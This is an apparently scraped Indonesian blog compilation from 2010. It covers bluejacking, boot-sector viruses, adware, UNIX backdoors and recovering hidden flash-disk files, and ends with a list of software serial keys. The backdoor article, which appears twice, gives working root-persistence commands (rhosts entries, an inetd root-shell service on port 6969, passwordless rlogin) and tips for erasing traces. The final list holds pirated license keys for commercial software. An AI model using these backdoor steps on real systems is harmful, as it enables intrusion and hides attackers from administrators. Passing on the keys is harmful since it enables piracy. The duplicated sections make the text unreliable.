BLUEJACKING
Sebelum saya berbicara lebih jauh tentang bluejacking, kita harus mengatahui dulu, apa itu bluetooth. Saat ini banyak peralatan yang dilengkapi fasilitas bluetooth, dimana fasilitas ini memungkinkan sebuah perangkat (ponsel, PDA, printer, kamera digital, komputer, handsfree, mouse, keyboard, modem dll.) dapat saling berhubungan dengan perangkat bluetooth lainnya tanpa menggunakan kabel yang secara teori dapat bekerja dalam jarak ± 10 meter.
Dalam sebuah ponsel atau PDA, fungsi bluetooth biasanya digunakan untuk berkirim nomor telepon, gambar, daftar kegiatan atau kalender, agar dapat saling bertukar data dengan perangkat bluetooth lainnya, kedua perangkat tersebut harus melakukan pairing terlebih dahulu, pairing adalah sebuah proses dimana ada salah satu perangkat yang bertindak sebagai 'pencari'(discover) dan perangkat lainnya yang menjadi 'yang dicari' (discoverable). Setelah melakukan pairing tersebut barulah kedua perangkat tadi dapat saling bertukar data.
Pada tindakan bluejacking untuk mengirimkan data kita tidak melalui tahap pairing sehingga korbannya tidak mengetahui bahwa ponselnya sedang disusupi oleh seseorang (pelaku bluejacking biasanya disebut bluejacker sedangkan korbannya disebut victim), seorang bluejacker dapat mengirimkan pesan atau gambar kepada perangkat korban secara tiba-tiba, sehingga pesan atau gambar nyelonong ke perangkat korban tanpa permisi, biasanya korban bluejacking kaget atau bahkan resah jika isi pesan atau gambar yang diterimanya bersifat teror.
Namun sejauh ini secara teknis tindakan bluejacking tidak terlalu berbahaya baik terhadap perangkat maupun program aplikasi yang terdapat dalam ponsel atau PDA, hanya saja si korban akan merasa terganggu dengan datangnya pesan secara tiba-tiba, si penerima pesan biasanya tidak dapat melacak dari mana pesan itu datang, sebab dalam hal ini perangkat bluetooth sama sekali tidak mengakses simcard hanya menggunakan gelombang pendek yang dimiliki oleh perangkat bluetooth, sehingga nomor si pengirim tidak dapat diketahui. Adapun ponsel yang rentan terhadap tindakan bluejacking ini adalah Sony Ericsson's T68, R520m, T68i, T610, Z1010, Z600 dan Nokia's 6310, 6310i, 3650, 7650, 8910 dan 8910i.
Bagaimana melakukan Bluejacking?
Untuk dapat melakukan bluejacking kita tidak membutuhkan pengetahuan dan kemampuan sekelas programer atau hacker, yang kita butuhkan hanyalah sebuah perangkat yang memiliki fasilitas bluetooth. Berikut ini adalah langkah-langkah yang dapat kita lakukan untuk melakukan bluejacking;
1. Bawalah perangkat bluetooth yang ada (Ponsel, PDA, PocketPC), dalam hal ini saya mengasumsikan bahwa kita menggunakan ponsel.
2. Buatlah daftar kontak baru pada phonebook dengan diisi pesan yang akan kita kirim pada seseorang, misalnya pada kolom First Name diisi kalimat "Selamat Datang di" sedangkan pada kolom Last Name diisi kalimat "Dunia Digital", simpanlah pesan tersebut sebagai daftar kontak yang baru. Jika mau kita bisa membuat kalimat lain sebanyak mungkin.
3. Pergilah ketempat ramai, atau tempat yang memungkinkan banyak orang membawa ponsel seperti Mall, Lobby, Restoran, Toko Ponsel dll.
4. Bukalah daftar kontak yang berisi pesan yang telah kita buat tadi, lalu pilih menu "Send Via Bluetooth"
5. Sesaat ponsel akan mencari perangkat bluetooth lain yang ada disekitar kita, jika tidak menemukan perangkat lain, pindahlah ketempat yang lebih ramai.
6. Jika ponsel menemukan perangakt bluetooth lain, maka akan muncul di layar ponsel kita, biasanya nama perangkat lain akan muncul sebagai merek ponsel yang bersangkutan tapi ada juga yang sudah dirubah oleh pemiliknya sebagai nama lain.
7. Jika perangkat yang ditemukan lebih dari satu, pilihlah salah satunya.
8. Jika berhasil maka daftar kontak yang berisi kalimat tadi akan terkirim pada perangkat tersebut.
9. Jika memungkinkan, lihatlah orang lain disekitar kita yang membawa perangkat bluetooth, kita juga harus dapat membedakan ponsel mana yang memiliki fasilitas bluetooth dan yang tidak.
10. Selanjutnya, terserah kita.
Sebenarnya ada tindakan penyusupan lain yang lebih mengerikan adalah apa yang disebut dengan bluesnarfing atau sering juga disebut dengan snarf attack, dengan metode yang hampir sama dengan bluejacking pelaku snarf attack dapat mengcopy semua data yang ada didalam ponsel korban seperti daftar kontak, kalender dan pesan yang ada dalam ponsel korban. Untuk melakukan bluesnarfing diperlukan laptop/PC yang didalamnya sudah terinstal aplikasi bluesnarfing namun sampai tulisan ini diturunkan belum ada satu pihakpun yang menyediakan aplikasi ini, baik di Internet maupun di pasaran selain aplikasi yang dimiliki salah satu peserta pameran CeBIT2004 di Hannover Jerman pada waktu lalu, mereka menggunakan aplikasi Bluez yang didalamnya terdiri dari aplikasi bluez-libs-2-.5,bluez-utils-2.4 and bluez-sdp-1.5 program tersebut dibuat dalam bahasa C dan PERL yang berjalan dibawah kernel Linux versi 2-6-2., lalu diinstalkan pada laptop COMPAQ Evo N600c ditambah dua buah peralatan bluetooth dongle-USB yang terpasang pada laptop tersebut.
Sampai saat ini kita memang belum pernah mendengar korban dari tindakan Bluesnarfing ini, namun tindakan percobaan yang pernah dilakukan oleh perusahaan yang bernama Salzburg Research Forschungsgesellschaft mbH dari Austria yang menempati stand hall 11 pada pameran CeBIT 2004 di Jerman sempat menghebohkan para pengunjung pameran tersebut karena hasilnya sungguh mengejutkan bahwa ponsel dan PDA yang selama ini mereka gunakan untuk menyimpan data penting dan rahasia dapat diakses dengan mudah oleh orang lain.
Pencegahan dari Tindakan Bluejacking dan Bluesnarfing:
Untuk mencegah agar perangkat bluetooth yang kita miliki agar tidak terkena tindakan bluejacking/bluesnarffing sebenarnya sangatlah sederhana, kuncinya adalah matikanlah fasilitas bluetooth yang ada pada ponsel kita jika berada ditempat umum atau jika memang fasilitas ini tidak digunakan. Tindakan lain yang lebih aman adalah dengan cara meng-upgrade firmware yang ada dalam ponsel kita dengan versi yang lebih baru.
Sebenarnya tindakan bluejacking ini dapat juga digunakan untuk hal-hal yang lebih positif, walaupun memang sedikit bersifat spamming, misalnya penawaran diskon suatu barang ketika seseorang yang memiliki perangkat bluetooth sedang melihat-lihat didepan toko yang menjual barang diskon tersebut, atau ucapan "selamat datang" ketika seseorang masuk kewilayah tertentu, misalnya.[Q]
Bluesnarfing
Snarf attack memungkinkan kita terhubung dengan ponsel Bluetooth tanpa ada peringatan kepada pemiliknya bahwa bahwa ponsel mereka sedang diintip oleh orang lain. Dengan metode ini, para hacker dapat mengakses data-data ponsel, termasuk di dalamnya phonebook, image, calendar, realtime clock, bussines card, properties bahkan nomor IMEI. Normalnya, hat ini mungkin dilakukan jika ponsel target dalam mode ‘discoverable’ atau ‘visible’, akan tetapi dengan aplikasi semacam
Boot Sector Viruses
Virus Boot sector ini sudah umum sekali menyebar (terus terang hardiskku sering diformat gara gara virus ini. Virus ini dalam menggandakan dirinya akan memindahkan atau menggantikan boot sector asli dengan program booting virus. Sehingga saat terjadi booting maka virus akan di load kememori dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar(ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar keseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain selain c:\)
contoh virus ::
- varian virus wyx (langganan gwa nih :) ex: wyx.C(B) menginfeksi boot record dan floopy ; panjang :520 bytes; karakteristik : memory resident dan terenkripsi)
- varian V-sign : menginfeksi : Master boot record ; panjang 520 bytes; karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)
- Stoned.june 4th/ bloody!: menginfeksi : Master boot record dan floopy; panjang 520 bytes; karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan pesan "Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali.
Wednesday, July 21, 2010
Adware Dan Backdoor Trojan
ADWARE
Adware adalah iklan yang dimasukan secara tersembunyi oleh pembuatprogram. Umumnya program diberikan secara gratis, tetapi dengan kompensasi pemakai harus menerima iklan pada program.
BACK DOOR TROJAN
Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewat belakang'. Backdoor berfungsi untuk memberikan sang programmer akses ke suatu sistem, tanpa sepengetahuan user lain ataupun sang sysadmin. Tentu saja sang programer di sini bisa juga diartikan 'sang penyusup'. Seringkali backdoor memberikan akses tak terbatas kepada siapapun juga yang mengetahui jalan masuknya. Walaupun tidak jarang vendor-vendor besar (baik hardware maupun software ) yang sengaja menempatkan backdoor tak terdokumentasi untuk kemudahan 'maintenance' dan sejenisnya, dalam artikel ini yang dimaksud adalah backdoor dalam artian memberikan akses root ke dalam sebuah sistem UNIX sebagai antisipasi jika sang sysadmin kebetulan menyadari bahwa ada penyerang di dalam sistem.
Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan berhasil masuk ke sebuah sistem dengan memanfaatkan login user dan segera menjalankan eksploit-eksploit lokal untuk mengambil alih kekuasaan root. Tentunya sayang jika saat sang sysadmin kembali bekerja di keesokan harinya, akses kamu ditutup. Nah, disinilah manfaatnya kita menanam satu atau lebih jalan masuk 'alternatif'. Jelas, sebagian besar teknik-teknik backdooring hanya bisa diterapkan jika kamu mempunyai perizinan root.
Ingat, bahwa tujuan membuat backdoor bukanlah untuk mendapatkan akses root, tetapi untuk mendapatkan akses root LAGI setelah sang sysadmin menutup segala jalan masuk normal. Terkadang sysadmin sering menganggap selama file-file /etc/hosts.deny telah dikonfigurasi, maka segala koneksi dari host kamu akan ditolak. Tentu saja kalian-kalian, sang cracker, kelihaian kung fu nya jauh di atas sang sysadmin, sebab tanpa sepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatif dengan privilese root.
Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti Backdoor di router-router, printserver, dll buatan 3Com), namun disini akan kami jelaskan cara membuat backdoor kamu sendiri di sebuah sistem UNIX. Jalan termudah (dan yang paling gampang ditangkap) adalah dengan melalui file /.rhosts:
korban# echo "indohack2.ri.go.id ganjaman" >> /.rhosts
perintah diatas akan menambah satu entri di file .rhosts (sistem luar-dalam contoh diatas user ganjaman dari indohack2.ri.go.id - yang bolehmengakses account tanpa password), dan untuk masuk kembali ke sistem dari account "ganjaman" di indohack2.ri.go.id :
ganjaman@indohack2> rlogin -l root korban.lameisp.net.id poof! shell root tanpa password!
Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan entri berikut dari file /etc/passwd sebuah sistem:
bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false
tentunya bagi mereka yang sering memanen password entri seperti di atas sudah tidak asing lagi. Account diatas adalah account yang digunakan oleh UNIX sistem secara internal. Seringkali banyak diantara crackers yang mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet dengan nama login "bin" tidak memerlukan password. Tapi ingatlah bahwa file /etc/passwd biasanya adalah file pertama yang akan diperiksa oleh sang sysadmin saat dia menyadari bahwa sistemnya telah kena susup. Agar kita lebih sulit dideteksi, maka ada baiknya kita buat file .rhosts di home directory milik bin. Kembali ke entri file password diatas, bisa kita lihat bahwa walaupun kita bisa me- rlogin -l bin korban.lameisp.net.id, namun kita masih juga tidak bisa mendapatkan shell sebab account 'bin' dikonfigurasikan untuk menolak penggunaan shell. Cara mengatasi masalah ini tentunya dengan membuat link dari /bin/false ke /bin/sh atau /bin/tcsh. Apa daya seorang sysadmin? Tentunya jika mereka memang keren kung fu nya, sang sysadmin akan mensetup sebuah skrip yang memeriksa keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah entri dari account-account internal dari /bin/false ke /nggak-ada-tuh atau string unik lainnya yang bukan merupakan nama file.
Metode backdooring lain adalah dengan memanfaatkan "in.rootd" (sebenernya ini hanyalah rekayasa saja, sebab sepanjang pengetahuan kami, nggak ada tuh yang namanya root daemon - tapi metode ini benar-benar cocok disebut rootd) yang pada dasarnya bertugas untuk membuat sebuah lubang masuk lewat salah satu port yang didefinisikan dalam "inetd":
root@korban# echo "ntcp 6969/tcp # Network Traffic Control Protocol" >> /etc/services root@korban# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r" >> /etc/inetd.conf root@korban# echo "echo indohack2.ri.go.id > ~root/.rhosts" > /tmp/crax0r menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistem yang cukup dahsyat, namun tidak akan segera tampak. Penjelasan dari ketiga perintah diatas:
1. Mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor port lain yang tidak begitu mencurigakan, silakan pilih mulai dari 1024 sampai 65000-an), sedangkan "Network Traffic Control Protocol" adalah karangan kamu sendiri sebab setiap service harus punya nama, dan biasanya sysadmin tidak akan begitu curiga dengan nama seperti itu.
2. Memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r setiapkali sang sistem menerima koneksi telnet lewat port 6969. Sayangnya mengeksekusi sebuah shell berprivilese root lewat cara ini hanya akan mengakibatkan sang sistem bengong, sebab kita tidak bisa memberikan perintah-perintah selayaknya kita login lewat jalur normal. Sang shell akan tetap dijalankan, namun tidak akan bisa mengeksekusi perintah kita. Untuk itulah kita buat satu skrip di direktori /tmp/crax0r (tentunya kamu lebih pintar dan memilih nama yang tidak begitu mencurigakan seperti /tmp/dev001).
3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang baru saja kita luncurkan (id=0 - root!). Tentunya kamu bisa saja menulis skrip yang lebih kompleks. Namun untuk menghemat tempat, kita lancarkan saja perintah yang sudah dibahas diatas, yaitu menambahkan entri dari mesin host kita ke file .rhosts milik root.
Tentu jika sang admin memang keren kung funya, rlogind akan dikonfigurasikan untuk tidak mengindahkan file .rhosts, namun jika kamu periksa isi direktori dan file "history" milik root dan isinya menunjukkan bahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatas akan memberikan jalan masuk lewat belakang ke dalam sistem target. Sekarang kamu tinggal: ganjaman@indohack2> telnet korban.lameisp.net.id 6969
Sistem kamu akan tersambung ke sistem target lewat port 6969, sedangkan daemon inet di mesin korban akan menerima sambungan tersebut, menjalankan perintah dalam skrip /tmp/crax0r dengan privilese root, dan dengan segera menutup kembali sambungan telnet. Sekarang .rhosts milik root sudah ditambahi satu entri lagi, yaitu nama host kamu. Untuk kembali menggarap sistem target (sebaiknya dilakukan saat itu juga, sebab sang sysadmin mungkin akan curiga melihat skrip 'asing' dijalankan lewat port 6969) kamu tinggal: ganjaman@indohack2> rlogin -l root korban.lameisp.net.id dan, BOOM! korban#
Shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemar ke indohack@hotmail.com, bertitel "Terimakasih, suhu Ganjaman dan SuperCock, atas ilmu ngent... engin badannya ..." :) ). Tapi ingatlah untuk segera menghapus file .rhosts dan jejak jejak lain. Tentunya kalau kung fu kamu emang udah cukup tinggi, teknik menyembunyikan diri dan antideteksi udah bukan barang asing bagi kamu, jadi, jangan lupa aktifkan segala spoofer program, dll. Kalau kamu benar-benar suka mengutak-utik, serangan bisa dibuat dengan lebih tersembunyi lagi, seperti dengan memanfaatkan service-service yang jarang (hampir tidak pernah dipakai) seperti utilitas-utilitas X, segala utilitas berkepala "r", dan banyak lagi.
Metode lain yang cukup populer adalah dengan membuat sebuah file dengan bit SUID tambahan, namun cara ini gampang terdeteksi jika kebetulan sistem mempunyai program audit keamanan yang akan mensensus seluruh file berbit SUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp atau lokasi homedir user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatu program yang sudah berjalan / terinstal secara default, seperti xterm dan splitvt, sehingga sebuah option rootshell akan secara otomatis execv("/bin/sh", "sh", NULL);.
Adware adalah iklan yang dimasukan secara tersembunyi oleh pembuatprogram. Umumnya program diberikan secara gratis, tetapi dengan kompensasi pemakai harus menerima iklan pada program.
BACK DOOR TROJAN
Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewat belakang'. Backdoor berfungsi untuk memberikan sang programmer akses ke suatu sistem, tanpa sepengetahuan user lain ataupun sang sysadmin. Tentu saja sang programer di sini bisa juga diartikan 'sang penyusup'. Seringkali backdoor memberikan akses tak terbatas kepada siapapun juga yang mengetahui jalan masuknya. Walaupun tidak jarang vendor-vendor besar (baik hardware maupun software ) yang sengaja menempatkan backdoor tak terdokumentasi untuk kemudahan 'maintenance' dan sejenisnya, dalam artikel ini yang dimaksud adalah backdoor dalam artian memberikan akses root ke dalam sebuah sistem UNIX sebagai antisipasi jika sang sysadmin kebetulan menyadari bahwa ada penyerang di dalam sistem.
Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan berhasil masuk ke sebuah sistem dengan memanfaatkan login user dan segera menjalankan eksploit-eksploit lokal untuk mengambil alih kekuasaan root. Tentunya sayang jika saat sang sysadmin kembali bekerja di keesokan harinya, akses kamu ditutup. Nah, disinilah manfaatnya kita menanam satu atau lebih jalan masuk 'alternatif'. Jelas, sebagian besar teknik-teknik backdooring hanya bisa diterapkan jika kamu mempunyai perizinan root.
Ingat, bahwa tujuan membuat backdoor bukanlah untuk mendapatkan akses root, tetapi untuk mendapatkan akses root LAGI setelah sang sysadmin menutup segala jalan masuk normal. Terkadang sysadmin sering menganggap selama file-file /etc/hosts.deny telah dikonfigurasi, maka segala koneksi dari host kamu akan ditolak. Tentu saja kalian-kalian, sang cracker, kelihaian kung fu nya jauh di atas sang sysadmin, sebab tanpa sepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatif dengan privilese root.
Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti Backdoor di router-router, printserver, dll buatan 3Com), namun disini akan kami jelaskan cara membuat backdoor kamu sendiri di sebuah sistem UNIX. Jalan termudah (dan yang paling gampang ditangkap) adalah dengan melalui file /.rhosts:
korban# echo "indohack2.ri.go.id ganjaman" >> /.rhosts
perintah diatas akan menambah satu entri di file .rhosts (sistem luar-dalam contoh diatas user ganjaman dari indohack2.ri.go.id - yang bolehmengakses account tanpa password), dan untuk masuk kembali ke sistem dari account "ganjaman" di indohack2.ri.go.id :
ganjaman@indohack2> rlogin -l root korban.lameisp.net.id poof! shell root tanpa password!
Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan entri berikut dari file /etc/passwd sebuah sistem:
bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false
tentunya bagi mereka yang sering memanen password entri seperti di atas sudah tidak asing lagi. Account diatas adalah account yang digunakan oleh UNIX sistem secara internal. Seringkali banyak diantara crackers yang mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet dengan nama login "bin" tidak memerlukan password. Tapi ingatlah bahwa file /etc/passwd biasanya adalah file pertama yang akan diperiksa oleh sang sysadmin saat dia menyadari bahwa sistemnya telah kena susup. Agar kita lebih sulit dideteksi, maka ada baiknya kita buat file .rhosts di home directory milik bin. Kembali ke entri file password diatas, bisa kita lihat bahwa walaupun kita bisa me- rlogin -l bin korban.lameisp.net.id, namun kita masih juga tidak bisa mendapatkan shell sebab account 'bin' dikonfigurasikan untuk menolak penggunaan shell. Cara mengatasi masalah ini tentunya dengan membuat link dari /bin/false ke /bin/sh atau /bin/tcsh. Apa daya seorang sysadmin? Tentunya jika mereka memang keren kung fu nya, sang sysadmin akan mensetup sebuah skrip yang memeriksa keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah entri dari account-account internal dari /bin/false ke /nggak-ada-tuh atau string unik lainnya yang bukan merupakan nama file.
Metode backdooring lain adalah dengan memanfaatkan "in.rootd" (sebenernya ini hanyalah rekayasa saja, sebab sepanjang pengetahuan kami, nggak ada tuh yang namanya root daemon - tapi metode ini benar-benar cocok disebut rootd) yang pada dasarnya bertugas untuk membuat sebuah lubang masuk lewat salah satu port yang didefinisikan dalam "inetd":
root@korban# echo "ntcp 6969/tcp # Network Traffic Control Protocol" >> /etc/services root@korban# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r" >> /etc/inetd.conf root@korban# echo "echo indohack2.ri.go.id > ~root/.rhosts" > /tmp/crax0r menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistem yang cukup dahsyat, namun tidak akan segera tampak. Penjelasan dari ketiga perintah diatas:
1. Mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor port lain yang tidak begitu mencurigakan, silakan pilih mulai dari 1024 sampai 65000-an), sedangkan "Network Traffic Control Protocol" adalah karangan kamu sendiri sebab setiap service harus punya nama, dan biasanya sysadmin tidak akan begitu curiga dengan nama seperti itu.
2. Memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r setiapkali sang sistem menerima koneksi telnet lewat port 6969. Sayangnya mengeksekusi sebuah shell berprivilese root lewat cara ini hanya akan mengakibatkan sang sistem bengong, sebab kita tidak bisa memberikan perintah-perintah selayaknya kita login lewat jalur normal. Sang shell akan tetap dijalankan, namun tidak akan bisa mengeksekusi perintah kita. Untuk itulah kita buat satu skrip di direktori /tmp/crax0r (tentunya kamu lebih pintar dan memilih nama yang tidak begitu mencurigakan seperti /tmp/dev001).
3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang baru saja kita luncurkan (id=0 - root!). Tentunya kamu bisa saja menulis skrip yang lebih kompleks. Namun untuk menghemat tempat, kita lancarkan saja perintah yang sudah dibahas diatas, yaitu menambahkan entri dari mesin host kita ke file .rhosts milik root.
Tentu jika sang admin memang keren kung funya, rlogind akan dikonfigurasikan untuk tidak mengindahkan file .rhosts, namun jika kamu periksa isi direktori dan file "history" milik root dan isinya menunjukkan bahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatas akan memberikan jalan masuk lewat belakang ke dalam sistem target. Sekarang kamu tinggal: ganjaman@indohack2> telnet korban.lameisp.net.id 6969
Sistem kamu akan tersambung ke sistem target lewat port 6969, sedangkan daemon inet di mesin korban akan menerima sambungan tersebut, menjalankan perintah dalam skrip /tmp/crax0r dengan privilese root, dan dengan segera menutup kembali sambungan telnet. Sekarang .rhosts milik root sudah ditambahi satu entri lagi, yaitu nama host kamu. Untuk kembali menggarap sistem target (sebaiknya dilakukan saat itu juga, sebab sang sysadmin mungkin akan curiga melihat skrip 'asing' dijalankan lewat port 6969) kamu tinggal: ganjaman@indohack2> rlogin -l root korban.lameisp.net.id dan, BOOM! korban#
Shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemar ke indohack@hotmail.com, bertitel "Terimakasih, suhu Ganjaman dan SuperCock, atas ilmu ngent... engin badannya ..." :) ). Tapi ingatlah untuk segera menghapus file .rhosts dan jejak jejak lain. Tentunya kalau kung fu kamu emang udah cukup tinggi, teknik menyembunyikan diri dan antideteksi udah bukan barang asing bagi kamu, jadi, jangan lupa aktifkan segala spoofer program, dll. Kalau kamu benar-benar suka mengutak-utik, serangan bisa dibuat dengan lebih tersembunyi lagi, seperti dengan memanfaatkan service-service yang jarang (hampir tidak pernah dipakai) seperti utilitas-utilitas X, segala utilitas berkepala "r", dan banyak lagi.
Metode lain yang cukup populer adalah dengan membuat sebuah file dengan bit SUID tambahan, namun cara ini gampang terdeteksi jika kebetulan sistem mempunyai program audit keamanan yang akan mensensus seluruh file berbit SUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp atau lokasi homedir user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatu program yang sudah berjalan / terinstal secara default, seperti xterm dan splitvt, sehingga sebuah option rootshell akan secara otomatis execv("/bin/sh", "sh", NULL);.
Thursday, July 15, 2010
MENAMPILKAN FOLDER YANG DI HIDDEN OLEH VIRUS DI FD
Jangan kaget ketika anda membuka flashdisk anda kemudian anda tidak menemukan data
Yang menurut anda telah anda simpan dengan baik. Sangat mungkin data tersebut di hidden oleh virus inilah yang biasanya dilakukan oleh virus local, file yang di infeksinya biasanya tidak terhapus tapi hanya di hidden oleh virus tersebut.
Berikut cara mengembalikannya:
1. Buka command prompt (DOS)
bisa via Start –>Run ketik cmd
atau pilih menu Start –> All Program –> Accessories –> command prompt
2. Pindah folder ke drive Flash disk
C:\Documents and Setting\user> e: (nama drive flash disk)
3. Lakukan pengecekan file di flash disk
E:\> dir /a
4. Gunakan syntax atau perintah attrib, untuk menampilkan file yang di hidden oleh virus
E\> attrib -S _H /S /D *
keterangan :
-S : Untuk menghilangkan attrib tipe sistem file
-H : Untuk menghilangkan attrib tipe hidden file
/S : Untuk memproses seluruh folder dan sub folder
/D : Memproses folder
* : Semua file/folder yang terdapat di USB Flashdisk
Setelah file bisa ditampilkan, jangan lupa untuk menghapus semua file application virus yang berekstensi .exe
Yang menurut anda telah anda simpan dengan baik. Sangat mungkin data tersebut di hidden oleh virus inilah yang biasanya dilakukan oleh virus local, file yang di infeksinya biasanya tidak terhapus tapi hanya di hidden oleh virus tersebut.
Berikut cara mengembalikannya:
1. Buka command prompt (DOS)
bisa via Start –>Run ketik cmd
atau pilih menu Start –> All Program –> Accessories –> command prompt
2. Pindah folder ke drive Flash disk
C:\Documents and Setting\user> e: (nama drive flash disk)
3. Lakukan pengecekan file di flash disk
E:\> dir /a
4. Gunakan syntax atau perintah attrib, untuk menampilkan file yang di hidden oleh virus
E\> attrib -S _H /S /D *
keterangan :
-S : Untuk menghilangkan attrib tipe sistem file
-H : Untuk menghilangkan attrib tipe hidden file
/S : Untuk memproses seluruh folder dan sub folder
/D : Memproses folder
* : Semua file/folder yang terdapat di USB Flashdisk
Setelah file bisa ditampilkan, jangan lupa untuk menghapus semua file application virus yang berekstensi .exe
serial number koleksi
3DS Max v3.1 Win9xNT
SN : 110-12345678 CD Key : S4ED6W
ACDSee 4.0 Winall.Regged
654-237-149-322-681-441
ACDSee 4.01
148-817-607-012-681-441 / 711-108-595-288-491-441
ACDSee 5.0
581-076-451-038-881-441
ACDSee 5.0 PowerPack
382-936-064-050-881-441
ACDSee 5.0 Standar
664-828-790-472-030-541
ACDSee 6.0 PowerPack
147-755-260-960-487-541
ACDSee 7.0.43 POWER
4WBDGK-KVP87-F23BT8-JWRN8P8
ACDSee 9.0 BUILD 5.5
DYWDLK-PS6C7-W39CLK-GL9TL23
ACDSee Pro 2.0.219
DB4DVH-3348T-3CLHF7-JB5Y5DZ
Adobe Illustrator 10
1034-1003-4400-0000-1115-2040
Adobe Pagemaker 6.52
03W652R3818820-549
Autocad 2000
Serial : 112-11111111 CD Key : 5X8NUG.
Autocad 2002
Serial : 400-12345678. CD Key : T4ED6P
Borland C++ Builder v.4.0 for Windows
Number : 3448. A Key : 86×8-19×0
COREL Print House 6
PH06WRD-0020403-WQ
COREL R.A.V.E 2
RA02WRD- 0001311-CHE
CORELDRAW 10
D10NR-32542-53T76
CORELDRRAW 11
DR11CRD-0012082-DGW
CORELDRAW 12
DR12WEX-1504397-KTY
WinZip 11 Pro
Name: FIKRUL SETIAWAN
S/N: QARY5-QFLGE-1AQA0-XTJ40-1P358-7LCY3
Adobe Acrobat v8.0 Professional
1118-1341-3925-5595-8141-7680
1016-1992-9210-9981-1392-2870
1118-1719-9236-6727-3285-3211
1016-1757-9008-0389-1405-2509
1118-1295-7743-3899-5988-7217
1016-1553-1956-8803-7545-2920
Adobe Photoshop 6
PWWW600R7105467-948
Adobe Photoshop 7
1045-0203-3247-2217-3566-6177
Adobe Photoshop 8/CS
s/n: ANGKA 1 SEMUA
Adobe Photoshop CS2 v9.0
S/N: 1045-0436-9551-0266-5984-9386
Adobe Photoshop Lightroom v1.0
116044770382008492207154
116045641847731830470143
116045913624002835701237
116047564730034623372249
116040029137790379586954
Adobe Photoshop Lightroom v1.0
1160-4301-7977-0221-2925-0568
Macromedia Dreamweaver 4
DWW400-03771-57289-73501
Macromedia Dreamweaver MX 2004
WPD700-58202-88194-29915
Macromedia Director 8.5
WDW850-02044-87235-26420
Macromedia Freand 11
FHW110-02426-47231-55458
Macromedia Fireworks 4
FWW400-02666-67248-0254
Macromedia Coldfusion MX
CPD600-08480-B7213-22568
Macromedia Flash MX
FLW600-09531-57240-83750
Cyberlink PowerDVD Deluxe v7.0.2211
MMWJC-FRW4Z-677TV-YC8US-ZLYV3-KPW7B
WE8LG-MENE9-QGNVQ-LNPCF-F5AVD-8URP5
28FC9-URJA8-NDJA5-QVPQJ-EEB4M-2FZQM
GLRGH-A6CS6-X8BTA-CGA6A-KHDCK-4KUW4
TGRZP-QQQUU-X49A5-HC9KJ-QSA8S-9PMMP
CyberLink PowerDVD 7
S/N: WTGC3-SBR8C-PWFXA-HAG87-UPXH6-RAYKE 7SJRX-LBFMF-JUH8A-UD88Y-KUNT2-EXUNQ 6XDFP-HRXSM-4J4ZU-C2XBU-EG384-MEEVFGMJLS-EWEUU-TDAGH-R7XUU-JNG4X-KPFXR 824RZ-WQA6F-RBVAM-5W9N8-EX3HL-QDU42
CYBERLINK DVDSUITE PRO V.5
MS595725518122J4
FLASH 5
FLW500-03143-77238-80660
FLASH 6
FLW600-11335-72240-33333
FLASH MX
FLW600-53733-75540-61552
HOY QUR’AN 7,1
N1A6-N0A9
COREL PRINT HOUSE 6
PH06WRD-0020403-WQF
DELPHI 5
111-111-1111 CODE= FEX1-91X0
DELPHI 6
Z9J8-PUM4N-C6GZQ CDKEY= RW2-7JW
DELPHI 7
GAKD-PD29Q9-RDF?JQ-X65Z
CD KEY = QY8.EEC
Dfx Winamp 8
Email: rabcodemax@yahoo.com
Serial number: MA2443456
DSL Speed v3.8
User Name : TEAM TBE
Serial : PDDI33L6JTW6
Google Earth Pro
Name: Shinder Jandu
S/N: JCPM7DVNY6MRE3G
Password: 123456789
Kaspersky 6.0
S/N: tybgedtyhr4rthtyh
Kaspersky Internet Security v6.0.1.411
DZ3A3-7XGVU-DH1YX-NXJYP
Microsoft Office 2003
GWH28-DGCMP-P6RC4-6J4MT-3HFDY
Microsoft Frontpage 2003
WFDWY-XQXJF-RHRYG-BG7RQ-BBDHM
Folder Lock 5.7.3
Name: james smith
S/N: 343944892
Counter-Strike
5Z62E-MTXQZ-Z32IY-NW2ZL-A3C4Q
Microsoft Office 2007
KGFVY-7733B-8WCK9-KTG64-BC7D8
Microsoft Office 2007 Pro
TT3M8-H3469-V89G6-8FWK7-D3Q9Q
Microsoft Office Professional 2007 Enterprise
